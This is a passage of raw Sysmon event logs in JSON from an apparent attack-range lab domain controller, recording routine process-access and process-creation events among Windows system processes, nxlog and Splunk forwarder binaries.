C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-0010FD360900}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-0010FD360900}","TargetProcessId":"2716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nProcessGuid: {E2A3D6B1-123A-5F25-0000-0010F1380900}\r\nProcessId: 5052\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","ProcessGuid":"{E2A3D6B1-123A-5F25-0000-0010F1380900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-123A-5F25-0000-0010F1380900}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-123A-5F25-0000-0010F1380900}","TargetProcessId":"5052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-123A-5F25-0000-0010F1380900}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-123A-5F25-0000-0010F1380900}","TargetProcessId":"5052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 